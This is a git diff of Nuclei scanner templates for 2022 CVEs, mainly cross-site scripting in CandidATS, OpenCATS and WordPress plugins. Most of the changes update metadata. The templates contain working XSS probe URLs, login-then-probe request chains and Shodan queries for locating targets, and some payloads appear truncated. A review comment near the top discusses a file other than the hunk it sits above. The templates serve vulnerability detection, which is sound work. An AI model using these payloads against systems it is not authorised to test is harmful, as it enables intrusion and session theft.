a/nuclei-templates/CVE-2022/CVE-2022-42746.yaml b/nuclei-templates/CVE-2022/CVE-2022-42746.yaml index 6ff93c907c..d16dedd21d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-42746.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-42746.yaml 
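Review bot: Dropping `cookie-reuse: true` and `req-condition: true` from the raw request sequence in CVE-2022-4260.yaml makes the login, nonce extraction and settings POST depend on the engine reusing the session cookie and enabling request conditions by default; that is the nuclei v3 behaviour, but nothing visible in this hunk pins a minimum engine version, and on an older engine the admin POST would presumably go out without the session cookie and the DSL matcher would return a silent false negative rather than an error. If the repository is meant to stay loadable by older releases the two keys should stay; otherwise a one-line comment on the `http:` block such as `# requires nuclei v3: cookie reuse and request conditions are enabled by default` would spare the next maintainer the same question. The same removal appears in CVE-2022-43014.yaml, CVE-2022-43015.yaml and CVE-2022-43016.yaml. The http block begins before this hunk and the matchers continue past it.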
@@ -6,21 +6,33 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the indexFile parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS. reference: - https://fluidattacks.com/advisories/modestep/ - https://nvd.nist.gov/vuln/detail/CVE-2022-42746 - https://candidats.net/ + - https://github.com/Henry4E36/POCS + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-42746 cwe-id: CWE-79 + epss-score: 0.00109 + epss-percentile: 0.42811 + cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: auieo + product: candidats shodan-query: http.html:"CandidATS" - verified: "true" - tags: cve,cve2022,candidats,xss + tags: cve,cve2022,candidats,xss,auieo -requests: +http: - method: GET path: - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0' @@ -42,5 +54,4 @@ requests: - type: status status: - 404 - -# Enhanced by md on 2022/12/13 +# digest: 4a0a00473045022100e05a50a6e132bac1f32ae519749f19608d564459b4cf2f5bc78878bc392979d802205e3df75d54d4f3d858178677f1d15edc59f2dcba8a7121a985e690d1131a06b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file 
diff --git a/nuclei-templates/CVE-2022/CVE-2022-42747.yaml b/nuclei-templates/CVE-2022/CVE-2022-42747.yaml index 767e94ed5a..bd1e3f515d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-42747.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-42747.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortBy parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the application. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS. reference: - https://fluidattacks.com/advisories/modestep/ - https://fluidattacks.com/advisories/jcole/ @@ -16,12 +20,18 @@ info: cvss-score: 6.1 cve-id: CVE-2022-42747 cwe-id: CWE-79 + epss-score: 0.00109 + epss-percentile: 0.43507 + cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: auieo + product: candidats shodan-query: http.html:"CandidATS" - verified: "true" - tags: cve,cve2022,candidats,xss + tags: cve,cve2022,candidats,xss,auieo -requests: +http: - method: GET path: - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&sortDirection=desc&indexFile=1&isPopup=0' 
@@ -43,5 +53,4 @@ requests: - type: status status: - 404 - -# Enhanced by md on 2022/12/13 +# digest: 4a0a004730450220674c64cb82f47fccf84aa02992e2383beb4ef86186c3540610bd5302bbaeb13e0221008dd0a1ac41467e3520b176248f8c8292dfdabd050f6915f34a0a248f760782b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-42748.yaml b/nuclei-templates/CVE-2022/CVE-2022-42748.yaml index adcfac438a..1dc7d0f8b4 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-42748.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-42748.yaml 
@@ -6,22 +6,33 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the sortDirection parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patches or updates provided by the vendor. reference: - https://fluidattacks.com/advisories/modestep/ - https://fluidattacks.com/advisories/jcole/ - https://candidats.net/ - https://nvd.nist.gov/vuln/detail/CVE-2022-42748 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-42748 cwe-id: CWE-79 + epss-score: 0.00109 + epss-percentile: 0.42811 + cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: auieo + product: candidats shodan-query: http.html:"CandidATS" - verified: "true" - tags: cve,cve2022,candidats,xss + tags: cve,cve2022,candidats,xss,auieo -requests: +http: - method: GET path: - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=0&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0' 
@@ -43,5 +54,4 @@ requests: - type: status status: - 404 - -# Enhanced by md on 2022/12/13 +# digest: 4a0a00473045022100bb5ffd4b21e445cf4234b76fc85113266a75cdbb2da6bb13444795dc3af242f1022022a7de122c708996659ebc47a7766409e68978393245344a63e8f68221e40060:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-42749.yaml b/nuclei-templates/CVE-2022/CVE-2022-42749.yaml index 37d5666fc2..0bac3de00d 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-42749.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-42749.yaml 
@@ -6,22 +6,33 @@ info: severity: medium description: | CandidATS 3.0.0 contains a cross-site scripting vulnerability via the page parameter of the ajax.php resource. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patch or upgrade to a non-vulnerable version of CandidATS. reference: - https://fluidattacks.com/advisories/modestep/ - https://fluidattacks.com/advisories/jcole/ - https://candidats.net/ - https://nvd.nist.gov/vuln/detail/CVE-2022-42749 + - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-42749 cwe-id: CWE-79 + epss-score: 0.00109 + epss-percentile: 0.42811 + cpe: cpe:2.3:a:auieo:candidats:3.0.0:-:*:*:*:*:*:* metadata: + verified: true + max-request: 1 + vendor: auieo + product: candidats shodan-query: http.html:"CandidATS" - verified: "true" - tags: cve,cve2022,candidats,xss + tags: cve,cve2022,candidats,xss,auieo -requests: +http: - method: GET path: - '{{BaseURL}}/ajax.php?f=getPipelineJobOrder&joborderID=50&page=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&entriesPerPage=15&sortBy=dateCreatedInt&sortDirection=desc&indexFile=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&isPopup=0' 
@@ -39,10 +50,9 @@ requests: part: header words: - text/html - condition: and + - type: status status: - 404 - -# Enhanced by md on 2022/12/13 +# digest: 4a0a0047304502210089fe04a15e4eed93eec92622f8f739ff1ae8fbf29d5bbed7f4d299bb7ea9e38a0220668d4c0c8de7a37e6d9c004beb28ba0b5f40262c4252936318e4798275678c65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4295.yaml b/nuclei-templates/CVE-2022/CVE-2022-4295.yaml index 06d5f0f947..834b58e037 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4295.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4295.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The Show All Comments WordPress plugin before 7.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the Show all comments plugin (7.0.1) or apply the vendor-supplied patch to fix the vulnerability. reference: @@ -16,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2022-4295 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29471 + epss-score: 0.00097 + epss-percentile: 0.40181 cpe: cpe:2.3:a:appjetty:show_all_comments:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,7 +28,7 @@ info: product: show_all_comments framework: wordpress publicwww-query: /wp-content/plugins/show-all-comments-in-one-page - tags: wpscan,cve,cve2022,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page + tags: cve2022,cve,wpscan,wp,wordpress,wp-plugin,xss,show-all-comments-in-one-page,appjetty http: - method: GET 
@@ -41,4 +43,4 @@ http: - 'contains(body, "")' - 'contains(body, "Select ")' condition: and -# digest: 4a0a0047304502200b2495b0c979e15c7380ca114c9bdad66622e76d955b321b069415107f9364b6022100deeb4950d93c281420b965993568a1a274146dda69c6e8320c732de1c53b8624:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203dbda7150adc50b6dfb1c523f72b257beda768f3910e46959f2b0ab81f805ae8022100becbd420e250bfaf91f33df4b6663c17f4a2fe2f82e4c1790a3b7f0f2476e7a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4301.yaml b/nuclei-templates/CVE-2022/CVE-2022-4301.yaml index 345235cb24..138f7b839b 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4301.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4301.yaml 
@@ -6,17 +6,22 @@ info: severity: medium description: | WordPress Sunshine Photo Cart plugin before 2.9.15 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: Fixed in version 2.9.15. reference: - https://wpscan.com/vulnerability/a8dca528-fb70-44f3-8149-21385039179d - https://nvd.nist.gov/vuln/detail/CVE-2022-4301 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-4301 cwe-id: CWE-79 - epss-score: 0.00071 - epss-percentile: 0.29471 + epss-score: 0.00119 + epss-percentile: 0.45193 cpe: cpe:2.3:a:sunshinephotocart:sunshine_photo_cart:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +29,7 @@ info: vendor: sunshinephotocart product: sunshine_photo_cart framework: wordpress - tags: cve,cve2022,xss,sunshine,wordpress,wp-plugin,wpscan,unauth + tags: cve2022,cve,xss,sunshine,wordpress,wp-plugin,wpscan,unauth,sunshinephotocart http: - method: GET 
@@ -48,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200d5b86f9c6ec39d69bf1f3be997260094e370204739c661c46c52e5433f868b302202981fb423c4b7f4f9e799e882762f1fa7b1f7fa9754c5a601c2702a92453657c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022004861bd06361905004a5a3a5fd6715270499b87d1113acf26602abe2cca52cce0221009a6dcf1e34ccf2f1cd18759061c384d5b62637883e9d2c2b0652467c6edb44fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43014.yaml b/nuclei-templates/CVE-2022/CVE-2022-43014.yaml index 896193e035..e9be075582 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43014.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43014.yaml 
@@ -6,20 +6,33 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the joborderID parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. + remediation: | + Upgrade to a patched version of OpenCATS or apply the necessary security patches provided by the vendor. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_joborderID.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43014 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-43014 cwe-id: CWE-79 + epss-score: 0.00099 + epss-percentile: 0.39871 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: opencats + product: opencats shodan-query: title:"OpenCATS" - verified: "true" - tags: cve,cve2022,xss,opencats,authenticated + tags: cve2022,cve,xss,opencats,authenticated -requests: +http: - raw: - | POST /index.php?m=login&a=attemptLogin HTTP/1.1 @@ -27,12 +40,10 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | GET /ajax.php?f=getPipelineJobOrder&joborderID=1)">%20&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word 
@@ -50,5 +61,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/13 +# digest: 4b0a00483046022100c667dbcf839a9b9666df759b351aa9863dd80927da1c754456cb38c9f1d2c74f022100b3f9f463cf96b3f9aca85d17122255bfe96dda694721022db00ae6e73b6701b5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43015.yaml b/nuclei-templates/CVE-2022/CVE-2022-43015.yaml index ba07736c00..46e174e250 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43015.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43015.yaml 
@@ -6,20 +6,33 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the entriesPerPage parameter. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_entriesPerPage.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43015 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-43015 cwe-id: CWE-79 + epss-score: 0.00099 + epss-percentile: 0.39871 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: opencats + product: opencats shodan-query: title:"OpenCATS" - verified: "true" tags: cve,cve2022,xss,opencats,authenticated -requests: +http: - raw: - | POST /index.php?m=login&a=attemptLogin HTTP/1.1 @@ -27,12 +40,10 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | GET /ajax.php?f=getPipelineJobOrder&joborderID=2&page=0&entriesPerPage=15)">%20&sortBy=dateCreatedInt&sortDirection=desc&indexFile=index.php&isPopup=0 HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word 
@@ -50,5 +61,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/13 +# digest: 490a0046304402207e5d9a4f267de600ae65549cbff97de0d51d050c89c4fef7fc2310d605343dfb02203c9e7bc08b6191c455ed70968efc3fb33378ad50795931fe96f85b24732fc83b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43016.yaml b/nuclei-templates/CVE-2022/CVE-2022-43016.yaml index 79f6773f15..6fa025fbf6 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43016.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43016.yaml 
@@ -6,20 +6,33 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the callback component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses the XSS vulnerability. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_callback.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43016 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Henry4E36/POCS classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2022-43016 cwe-id: CWE-79 + epss-score: 0.00099 + epss-percentile: 0.39871 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: opencats + product: opencats shodan-query: title:"OpenCATS" - verified: "true" - tags: cve,cve2022,xss,opencats,authenticated + tags: cve2022,cve,xss,opencats,authenticated -requests: +http: - raw: - | POST /index.php?m=login&a=attemptLogin HTTP/1.1 @@ -27,12 +40,10 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | GET /index.php?m=toolbar&callback=&a=authenticate HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word 
@@ -50,5 +61,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/13 +# digest: 490a0046304402204ba6921db05acebd0c6310fe279d69a0241eea61a56fe98076c3acbbbde12bd302206466948902e44608beedb1c1ae6d7c10f935634a10fc2a843fc9362270070d4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43017.yaml b/nuclei-templates/CVE-2022/CVE-2022-43017.yaml index 4088db0a0b..e30ecdfee1 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43017.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43017.yaml @@ -6,6 +6,10 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the indexFile component. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. + remediation: | + To mitigate this vulnerability, it is recommended to apply the latest security patches or upgrade to a newer version of OpenCATS that addresses this issue. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_indexFile.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43017 @@ -14,12 +18,18 @@ info: cvss-score: 6.1 cve-id: CVE-2022-43017 cwe-id: CWE-79 + epss-score: 0.00099 + epss-percentile: 0.40565 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: opencats + product: opencats shodan-query: title:"OpenCATS" - verified: "true" tags: cve,cve2022,xss,opencats,authenticated -requests: +http: - raw: - | POST /index.php?m=login&a=attemptLogin HTTP/1.1 
@@ -27,12 +37,10 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)">&isPopup=0 HTTP/1.1 Host: {{Hostname}} - cookie-reuse: true matchers-condition: and matchers: - type: word @@ -50,5 +58,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/13 +# digest: 4a0a00473045022100dd87ebfe6d6cf8f91e1b8675a0783c24940fcd4f08ce35c16db45abbe6e0113b022015d1ef8dd35c27d9ae583a14fe81180a74d4d6b16e278c22df6dcc6eaf331d12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43018.yaml b/nuclei-templates/CVE-2022/CVE-2022-43018.yaml index de8bd46573..5b1583f4d7 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43018.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43018.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OpenCATS 0.9.6 contains a cross-site scripting vulnerability via the email parameter in the Check Email function. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + remediation: | + Upgrade to a patched version of OpenCATS or apply the necessary security patches provided by the vendor. reference: - https://github.com/hansmach1ne/opencats_zero-days/blob/main/XSS_in_checkEmail.md - https://nvd.nist.gov/vuln/detail/CVE-2022-43018 
@@ -14,12 +16,18 @@ info: cvss-score: 6.1 cve-id: CVE-2022-43018 cwe-id: CWE-79 + epss-score: 0.00099 + epss-percentile: 0.40565 + cpe: cpe:2.3:a:opencats:opencats:0.9.6:*:*:*:*:*:*:* metadata: + verified: true + max-request: 2 + vendor: opencats + product: opencats shodan-query: title:"OpenCATS" - verified: "true" tags: cve,cve2022,xss,opencats,authenticated -requests: +http: - raw: - | POST /index.php?m=login&a=attemptLogin HTTP/1.1 @@ -27,14 +35,13 @@ requests: Content-Type: application/x-www-form-urlencoded username={{username}}&password={{password}} - - | GET /index.php?m=toolbar&callback=abcd&a=checkEmailIsInSystem&email= HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 2 - cookie-reuse: true + matchers-condition: and matchers: - type: word @@ -50,5 +57,4 @@ requests: - type: status status: - 200 - -# Enhanced by md on 2022/12/13 +# digest: 490a00463044022037f2672c9d3f40fe1c475aba72b2b7a715a05dcaf7c74852c8259fb3d9b56ef7022049e93237d4d7b9f02e2381b97d9251f3f7ff608f1214edb5e5a4926275f7d60f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4305.yaml b/nuclei-templates/CVE-2022/CVE-2022-4305.yaml index 93bcebef06..d8b5febff5 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4305.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4305.yaml @@ -10,13 +10,14 @@ info: reference: - https://wpscan.com/vulnerability/286d972d-7bda-455c-a226-fd9ce5f925bd - https://nvd.nist.gov/vuln/detail/CVE-2022-4305 + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2022-4305 cwe-id: CWE-269 - epss-score: 0.04788 - epss-percentile: 0.91851 + epss-score: 0.04963 + epss-percentile: 0.92644 cpe: cpe:2.3:a:wp-buy:login_as_user_or_customer_\(user_switching\):*:*:*:*:*:wordpress:*:* metadata: verified: true 
@@ -25,7 +26,7 @@ info: product: login_as_user_or_customer_\(user_switching\) framework: wordpress publicwww-query: /wp-content/plugins/login-as-customer-or-user - tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass + tags: cve,cve2022,wpscan,wordpress,wp-plugin,wp,login-as-customer-or-user,auth-bypass,wp-buy http: - raw: @@ -44,4 +45,4 @@ http: - contains(header_2, "text/html") - contains(body_2, 'Edit Profile') && contains(body_2, 'All Posts') condition: and -# digest: 4a0a00473045022036db66899c57158fb4aef8d6eeadb799f9bb12778466302abc075b47b6d507680221008de6b55382749d49e5f7e81ef548f98309ef4b1e10106a23499fc678ee9aceba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f40d1c4af7efd3f85e0f706dd731556e8b8c115e956fbb33fde0a16ebaa3183002200422ebf2a940f67382378fbf9b001f144f552465c6679e84b40560db876877cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-4306.yaml b/nuclei-templates/CVE-2022/CVE-2022-4306.yaml index ea9e4509f7..af318067a5 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-4306.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-4306.yaml 
@@ -6,17 +6,22 @@ info: severity: medium description: | WordPress Panda Pods Repeater Field before 1.5.4 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape a parameter before outputting it back in the page. This can be leveraged against a user who has at least Contributor permission. An attacker can also steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft or unauthorized actions. remediation: Fixed in version 1.5.4. reference: - https://wpscan.com/vulnerability/18d7f9af-7267-4723-9d6f-05b895c94dbe - https://nvd.nist.gov/vuln/detail/CVE-2022-4306 + - https://github.com/ARPSyndicate/cvemon + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/cyllective/CVEs classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2022-4306 cwe-id: CWE-79 - epss-score: 0.00077 - epss-percentile: 0.32318 + epss-score: 0.00092 + epss-percentile: 0.37956 cpe: cpe:2.3:a:panda_pods_repeater_field_project:panda_pods_repeater_field:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -24,7 +29,7 @@ info: vendor: panda_pods_repeater_field_project product: panda_pods_repeater_field framework: wordpress - tags: cve,cve2022,xss,panda,pods,repeater,wordpress,wp-plugin,wpscan,authenticated + tags: cve,cve2022,xss,panda,pods,repeater,wordpress,wp-plugin,wpscan,authenticated,panda_pods_repeater_field_project http: - raw: 
@@ -45,4 +50,4 @@ http: - 'contains(body_2, "alert(document.domain)")' - 'contains(body_2, "panda-repeater-add-new")' condition: and -# digest: 490a0046304402202ab2df88716a10554dbc0b0f3aba6dc49b3a6542ba12e4e385789dab2f947da602207faf9967535b680e87f4ced8e28edc1dfcf0ac4bf1a3317bcfba321cd1bd843b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d682dc0deb41b55d00a3fa9025b6e1d5ec6a980ea73308b00592db5f9c317eed022100bbb00e701c82b70533ae2125cbbe1ea9c19ba5ffe06aa67a1830a8d432c0fd9c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/nuclei-templates/CVE-2022/CVE-2022-43140.yaml b/nuclei-templates/CVE-2022/CVE-2022-43140.yaml index d2c504ed63..e3e3d11b41 100644 --- a/nuclei-templates/CVE-2022/CVE-2022-43140.yaml +++ b/nuclei-templates/CVE-2022/CVE-2022-43140.yaml @@ -18,31 +18,26 @@ info: cvss-score: 7.5 cve-id: CVE-2022-43140 cwe-id: CWE-918 - epss-score: 0.01954 - epss-percentile: 0.88673 + epss-score: 0.15211 + epss-percentile: 0.95316 cpe: cpe:2.3:a:keking:kkfileview:4.1.0:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: keking product: kkfileview - shodan-query: - - http.html:"kkFileView" - - http.html:"kkfileview" - fofa-query: - - app="kkFileView" - - 